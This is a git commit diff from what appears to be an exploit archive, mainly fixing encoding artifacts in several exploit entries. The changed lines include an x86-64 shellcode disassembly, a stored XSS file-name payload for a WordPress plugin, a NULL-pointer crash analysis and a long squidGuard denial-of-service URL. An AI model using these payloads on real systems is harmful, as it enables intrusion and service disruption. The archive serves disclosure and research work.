DB: 2016-04-10

This commit is contained in:
Offensive Security 2016-04-10 05:03:48 +00:00
parent 1f79ff2236
commit 830ff3bd6a
6 changed files with 640 additions and 639 deletions

1224
files.csv

File diff suppressed because it is too large Load diff

View file

@ -55,7 +55,7 @@ int main(int argc, char **argv)
exit(EXIT_FAILURE); exit(EXIT_FAILURE);
} }
} }
=09
snprintf(line, sizeof(line), "%c%s root %s %s\n",=20 snprintf(line, sizeof(line), "%c%s root %s %s\n",=20
6, argv[1], (mode)? "start":"stop", argv[1]); 6, argv[1], (mode)? "start":"stop", argv[1]);

View file

@ -8,21 +8,21 @@ shell: file format elf64-x86-64
Disassembly of section .text: Disassembly of section .text:
0000000000400080 <start>: 0000000000400080 <start>:
400080:=0948 b9 ff ff ff ff ff =09movabs rcx,0xffffffffffffffff 400080: 48 b9 ff ff ff ff ff movabs rcx,0xffffffffffffffff
400087:=09ff ff ff=20 400087: ff ff ff=20
40008a:=0949 b8 ae b7 72 c3 db =09movabs r8,0xfffaf0dbc372b7ae 40008a: 49 b8 ae b7 72 c3 db movabs r8,0xfffaf0dbc372b7ae
400091:=09f0 fa ff=20 400091: f0 fa ff=20
400094:=0949 31 c8 =09xor r8,rcx 400094: 49 31 c8 xor r8,rcx
400097:=0941 50 =09push r8 400097: 41 50 push r8
400099:=0949 b8 d0 9d 96 91 d0 =09movabs r8,0x978cd0d091969dd0 400099: 49 b8 d0 9d 96 91 d0 movabs r8,0x978cd0d091969dd0
4000a0:=09d0 8c 97=20 4000a0: d0 8c 97=20
4000a3:=0949 31 c8 =09xor r8,rcx 4000a3: 49 31 c8 xor r8,rcx
4000a6:=0941 50 =09push r8 4000a6: 41 50 push r8
4000a8:=0949 b8 b7 ce 2d ad 4f =09movabs r8,0x46b7c44fad2dceb7 4000a8: 49 b8 b7 ce 2d ad 4f movabs r8,0x46b7c44fad2dceb7
4000af:=09c4 b7 46=20 4000af: c4 b7 46=20
4000b2:=0949 31 c8 =09xor r8,rcx 4000b2: 49 31 c8 xor r8,rcx
4000b5:=0941 50 =09push r8 4000b5: 41 50 push r8
4000b7:=09ff e4 =09jmp rsp 4000b7: ff e4 jmp rsp
2015 William Borskey 2015 William Borskey

View file

@ -11,18 +11,19 @@
-- Description -- -- Description --
This stored XSS vulnerability allows any authenticated wordpress user The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file:
to inject malicious code via the name of the uploaded file:
e.g. <svg onload=3D3Dalert(0)>.jpg
The vulnerability exists because the file name is not properly sanitized Example: <svg onload=alert(0)>.jpg
and this can lead to malicious code injection that will be executed on the
target=3DE2=3D80=3D99s browser The vulnerability exists because the file name is not properly sanitized
and this can lead to malicious code injection that will be executed on the
targets browser.
-- Proof of Concept -- -- Proof of Concept --
1. The attacker creates a new download package via the plugin's menu 1. The attacker creates a new download package via the plugin's menu
and uploads a file with the name: <svg onload=3D3Dalert(0)>.jpg and uploads a file with the name: <svg onload=alert(0)>.jpg
2. The stored XSS can be triggered when an authenticated user (e.g. admin) 2. The stored XSS can be triggered when an authenticated user (e.g. admin)
attempts to edit this download package attempts to edit this download package

View file

@ -18,7 +18,7 @@ The "OpenEXEfile" function does not check if the return value of strchr() is zer
add edi, 4 add edi, 4
mov [esp+10h+var_C], 20h mov [esp+10h+var_C], 20h
mov [esp+10h+arg_24], eax mov [esp+10h+arg_24], eax
call strchr ; return EAX=3D 0 call strchr ; return EAX= 0
mov [esp+10h+var_10], eax mov [esp+10h+var_10], eax
mov [esp+10h+arg_28], eax ; (!) mov [esp+10h+arg_28], eax ; (!)
call strlen ; ntdll.strlen(s) call strlen ; ntdll.strlen(s)
@ -28,7 +28,7 @@ ntdll.strlen(s) - NULL parameter
--------------------------------------------------------------------- ---------------------------------------------------------------------
ntdll_strlen: ntdll_strlen:
mov ecx, [esp+4] ; [esp+4] =3D 0 NULL pointer mov ecx, [esp+4] ; [esp+4] = 0 NULL pointer
test ecx, 3 ; ... test ecx, 3 ; ...
jz short loc_77C77510 ; jump jz short loc_77C77510 ; jump
... ...

View file

@ -7,8 +7,8 @@ A successful exploit will cause the application to enter emergency mode in which
squidGuard 1.4 is vulnerable; other versions may also be affected. squidGuard 1.4 is vulnerable; other versions may also be affected.
http://www.example.com/_playlist/playlist.xml?parm=0.25732559903520535?parm=0.8294737075929047?parm=0.24014121683296297?parm=0.9460915929498649?parm=0.3974535575371201?parm=0.797955814252201?parm=0.5941665450866088?parm=0.6912115486553755?parm=0.05073890069479603?parm=0.8963961504041598?parm=0.43654825009701137?parm=0.8214705010294044?parm=0.5274569610084057?parm=0.0007274525371858687?parm=0.14506218122553893?parm=0.49125362580323495?parm=0.6941617625067622?parm=0.7331781580530978?parm=0.6610984755864507?parm=0.8694141102186517?parm=0.1290539846224843?parm=0.45549314193532453?parm=0.860371532284247?parm=0.019043415282676057?parm=0.1470360022957906?parm=0.9782236742775064?parm=0.24810547207701195?parm=0.5038849472610185?parm=0.32986064536502857?parm=0.3443933666849265?parm=0.8665425396928025?parm=0.8360460125669642?parm=0.11572512117125244?pa http://www.example.com/_playlist/playlist.xml?parm=0.25732559903520535?parm=0.8294737075929047?parm=0.24014121683296297?parm=0.9460915929498649?parm=0.3974535575371201?parm=0.797955814252201?parm=0.5941665450866088?parm=0.6912115486553755?parm=0.05073890069479603?parm=0.8963961504041598?parm=0.43654825009701137?parm=0.8214705010294044?parm=0.5274569610084057?parm=0.0007274525371858687?parm=0.14506218122553893?parm=0.49125362580323495?parm=0.6941617625067622?parm=0.7331781580530978?parm=0.6610984755864507?parm=0.8694141102186517?parm=0.1290539846224843?parm=0.45549314193532453?parm=0.860371532284247?parm=0.019043415282676057?parm=0.1470360022957906?parm=0.9782236742775064?parm=0.24810547207701195?parm=0.5038849472610185?parm=0.32986064536502857?parm=0.3443933666849265?parm=0.8665425396928025?parm=0.8360460125669642?parm=0.11572512117125244?pa
rm=0.03510514000002962?parm=0.6746931283264278?parm=0.4470450325834908?parm=0.07785764204006762?parm=0.3401613372413357?parm=0.6885655479211563?parm=0.3378645245893567?parm=0.7530888030812639?parm=0.4385274529715908?parm=0.8546846734552437?parm=0.943562659437982?parm=0.2690958544139864?parm=0.9414778696948228?parm=0.9705285143976852?parm=0.03412914860633709?parm=0.5629524868314979?parm=0.26551896178241496?parm=0.9625820765908634?parm=0.6656541817421336?parm=0.6838127452100081?parm=0.2226939131764789?parm=0.48602838974004015?parm=0.2945117583623632?parm=0.529002994268698?parm=0.6426306330058106?parm=0.11966694941771472?parm=0.1721417044468887?parm=3D0.3754902481844036?parm=0.6737018509787533?parm=0.39546949087944683?parm=0.0491472806762866?parm=0.7376419322110352?parm=0.6499250853081242?parm=0.5242544168272583?parm=0.034808393547313354?parm rm=0.03510514000002962?parm=0.6746931283264278?parm=0.4470450325834908?parm=0.07785764204006762?parm=0.3401613372413357?parm=0.6885655479211563?parm=0.3378645245893567?parm=0.7530888030812639?parm=0.4385274529715908?parm=0.8546846734552437?parm=0.943562659437982?parm=0.2690958544139864?parm=0.9414778696948228?parm=0.9705285143976852?parm=0.03412914860633709?parm=0.5629524868314979?parm=0.26551896178241496?parm=0.9625820765908634?parm=0.6656541817421336?parm=0.6838127452100081?parm=0.2226939131764789?parm=0.48602838974004015?parm=0.2945117583623632?parm=0.529002994268698?parm=0.6426306330058106?parm=0.11966694941771472?parm=0.1721417044468887?parm=0.3754902481844036?parm=0.6737018509787533?parm=0.39546949087944683?parm=0.0491472806762866?parm=0.7376419322110352?parm=0.6499250853081242?parm=0.5242544168272583?parm=0.034808393547313354?parm
=0.4073861597524363?parm=0.05573713697624749?parm=0.9572804384429524?parm=0.1817429853821192?parm=0.014327680461904801?parm=0.17253608539764576?parm=0.8581309328485324?parm=0.9953321132994779?parm=0.08106975895631952?parm=0.4488913260181805?parm=0.1500808162508912?parm=0.6036570089972113?parm=0.3429374525213048?parm=0.5005802517999419?parm=0.051207514503536666?parm=0.766079189716261?parm=0.05149314425197127?parm=0.9171176947996869?parm=0.9128287890179406?parm=0.2472275256231583?parm=0.08768066601448787?parm=0.7282021350271008?parm=0.7364195421315026?parm=0.33803910476243226?parm=0.9731293024794875?parm=0.4665109365664606?parm=0.9599808584667793?parm=0.4666333564612767?parm=0.2870947294724183?parm=0.2525336676197266?parm=0.9769042933525486?parm=0.9091816595515594?parm=0.5717086294621162?parm=0.22264183558725903?parm=0.3786950609979425?par =0.4073861597524363?parm=0.05573713697624749?parm=0.9572804384429524?parm=0.1817429853821192?parm=0.014327680461904801?parm=0.17253608539764576?parm=0.8581309328485324?parm=0.9953321132994779?parm=0.08106975895631952?parm=0.4488913260181805?parm=0.1500808162508912?parm=0.6036570089972113?parm=0.3429374525213048?parm=0.5005802517999419?parm=0.051207514503536666?parm=0.766079189716261?parm=0.05149314425197127?parm=0.9171176947996869?parm=0.9128287890179406?parm=0.2472275256231583?parm=0.08768066601448787?parm=0.7282021350271008?parm=0.7364195421315026?parm=0.33803910476243226?parm=0.9731293024794875?parm=0.4665109365664606?parm=0.9599808584667793?parm=0.4666333564612767?parm=0.2870947294724183?parm=0.2525336676197266?parm=0.9769042933525486?parm=0.9091816595515594?parm=0.5717086294621162?parm=0.22264183558725903?parm=0.3786950609979425?par
m=0.5845679157357075?parm=0.5396548326610127?parm=0.9233495028064524?parm=0.0974877689966982?parm=0.7965176866365765?parm=0.2860844780143996?parm=0.0027286208156194203?parm=0.4651091074998567?parm=0.5730070981414728?parm=0.2505283628059568?parm=0.6441995109312953?parm=0.7025116726949593?parm=0.9451446634320427?parm=0.8747596688711037?parm=0.7084257035096256?parm=0.5067240755386497?parm=0.10635286404950961?parm=0.2590060181978189?parm=0.4757993339954312?parm=0.2120319757985698?parm=0.8975584037174784?parm=0.631604652076309?parm=0.2150116248909476?parm=0.46792574310758606?parm=0.4752334181586533?parm=0.11614011486437892?parm=0.5424607368502887?parm=3D0.49842045831432846?parm=0.3365122016115487?parm=0.10529902337628827?parm=0.6827568962602503?parm=0.7856740326146926?parm=0.09924147705627229?parm=0.5321218821234125?parm=0.29234258833331983?par m=0.5845679157357075?parm=0.5396548326610127?parm=0.9233495028064524?parm=0.0974877689966982?parm=0.7965176866365765?parm=0.2860844780143996?parm=0.0027286208156194203?parm=0.4651091074998567?parm=0.5730070981414728?parm=0.2505283628059568?parm=0.6441995109312953?parm=0.7025116726949593?parm=0.9451446634320427?parm=0.8747596688711037?parm=0.7084257035096256?parm=0.5067240755386497?parm=0.10635286404950961?parm=0.2590060181978189?parm=0.4757993339954312?parm=0.2120319757985698?parm=0.8975584037174784?parm=0.631604652076309?parm=0.2150116248909476?parm=0.46792574310758606?parm=0.4752334181586533?parm=0.11614011486437892?parm=0.5424607368502887?parm=0.49842045831432846?parm=0.3365122016115487?parm=0.10529902337628827?parm=0.6827568962602503?parm=0.7856740326146926?parm=0.09924147705627229?parm=0.5321218821234125?parm=0.29234258833331983?par
m=0.45540015833322023?parm=0.5647044038008046?parm=0.46702725451889426?parm=0.4662535800019342?parm=0.7323923339134595?parm=0.6268917225432019?parm=0.7629286375836214?parm=0.9123040395199864?parm=0.5815462771024456?parm=0.5345761196888793?parm=0.9209602153432136?parm=0.04748725664240383?parm=0.05308779345336989?parm=0.8610787797224873?parm=0.9557722872296609?parm=0.9481407994385496?parm=0.9102836584825768?parm=0.2914997397760458?parm=0.8020533987162777?parm=0.6684330848337933?parm=0.8337337199569539?parm=0.9983168241581639?parm=0.7228803317315997?parm=0.43098615737758783?parm=0.8684119503556965?parm=0.9436400538914193?parm=0.25569358266277475?parm3D0.58895697 m=0.45540015833322023?parm=0.5647044038008046?parm=0.46702725451889426?parm=0.4662535800019342?parm=0.7323923339134595?parm=0.6268917225432019?parm=0.7629286375836214?parm=0.9123040395199864?parm=0.5815462771024456?parm=0.5345761196888793?parm=0.9209602153432136?parm=0.04748725664240383?parm=0.05308779345336989?parm=0.8610787797224873?parm=0.9557722872296609?parm=0.9481407994385496?parm=0.9102836584825768?parm=0.2914997397760458?parm=0.8020533987162777?parm=0.6684330848337933?parm=0.8337337199569539?parm=0.9983168241581639?parm=0.7228803317315997?parm=0.43098615737758783?parm=0.8684119503556965?parm=0.9436400538914193?parm=0.25569358266277475?parm3D0.58895697